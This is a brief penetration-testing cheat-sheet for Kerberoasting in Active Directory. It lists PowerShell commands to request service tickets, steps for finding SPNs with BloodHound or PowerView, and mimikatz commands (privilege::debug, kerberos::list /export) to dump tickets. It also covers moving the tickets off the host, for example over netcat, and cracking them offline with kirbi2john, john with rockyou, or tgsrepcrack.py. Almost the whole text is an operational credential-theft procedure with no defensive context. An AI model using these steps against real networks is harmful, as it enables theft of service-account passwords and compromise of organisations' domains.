using mimikatz
- Method 1
Type 1) & 2) in powershell or cmd , this will generate requested service ticket
1) Add-Type -AssemblyName System.IdentityModel
2)
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<SPN>”
to get SPN, go to bloodhound>select service account>node info>spn
Or with
PowerView with the command Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname
3) Run mimikatz.exe
privilege::debug
4) kerberos::list /export , download service ticket
5) exit to exit mimikatz
6) dir to check output and select the desire file and transfer it on your linux machine (if netcat used then transfer it in binary)
7) kirbi2john <file> >hash.txt
8) john hash.txt —wordlist=rockyou.txt
- Method 2
1. Follow till step
5 to export service ticket , then
.
/tgsrepcrack.py <wordlist> <.kirbi file>